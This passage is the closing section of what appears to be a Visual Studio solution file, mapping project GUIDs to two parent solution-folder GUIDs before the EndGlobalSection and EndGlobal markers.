184 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
185 | {0E01D108-8DD7-4164-BABD-5257095F0CAF} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
186 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
187 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
188 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
189 | {77301751-93B6-4748-87CE-BEABD468F549} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
190 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
191 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893} = {CA099911-8087-4632-96A5-A85511712F38}
192 | {7A811860-B9FC-4F64-BE80-DE0D30551A21} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
193 | {85B4ED76-7171-4CDF-B909-654E77F54FA4} = {CA099911-8087-4632-96A5-A85511712F38}
194 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57} = {CA099911-8087-4632-96A5-A85511712F38}
195 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0} = {CA099911-8087-4632-96A5-A85511712F38}
196 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8} = {CA099911-8087-4632-96A5-A85511712F38}
197 | EndGlobalSection
198 | EndGlobal
199 |
--------------------------------------------------------------------------------